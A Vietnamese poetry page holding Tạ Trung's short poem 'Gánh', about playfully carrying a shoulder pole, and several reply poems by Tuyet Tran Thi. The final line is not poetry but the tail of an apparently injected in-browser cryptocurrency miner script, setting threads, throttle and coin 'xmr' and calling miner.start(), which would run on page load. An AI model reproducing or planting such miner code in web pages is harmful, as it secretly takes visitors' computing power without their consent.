Gánh - Tạ Trung -

Gánh

Tạ Trung


Em gánh niềm vui điệu chút thôi

Mà sao lọng cọng tội ghê nơi
Oằn lưng lụm cụm trên vai áo
Nhổng dzít khom mình chẳng thảnh thơi
Thuở nhỏ chắc chưa từng gánh đời
Nên giờ thấy ngộ thử xem chơi 
Nhanh tay chốp lấy vài pô đẹp
Gửi đến đồng môn một nụ cười

Cảm tác
Tuyet Tran Thi

Gánh trọn niềm vui tới mọi người
Người ưng thủ thỉ thật là vui
Không ưng lại bảo " Dư hơi chán !”
Gánh vác chi cho mệt cuộc đời 
Kiếp trước phải chăng vay cái nợ
Cõi này ngậm đắng dạ chơi vơi 
Nhân tình thế thái chơi không giận
Mặc kệ thời gian sẽ trả lời ...Em gánh niềm vui gánh cả đời
Chen vào sứ mạng muốn hụt hơi
Nay đôi quang gánh thơm với bí
Khom mình tạo dáng thử xem chơi...hi hi


Tuyet Tran Thi

 Em gánh niềm vui... nên rất vui
Cho tròn nguyện ước của bao người
Mặc dù bao tiếng đời mai mỉa
Niềm vui vẫn cứ tỏa lan nhanh...

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();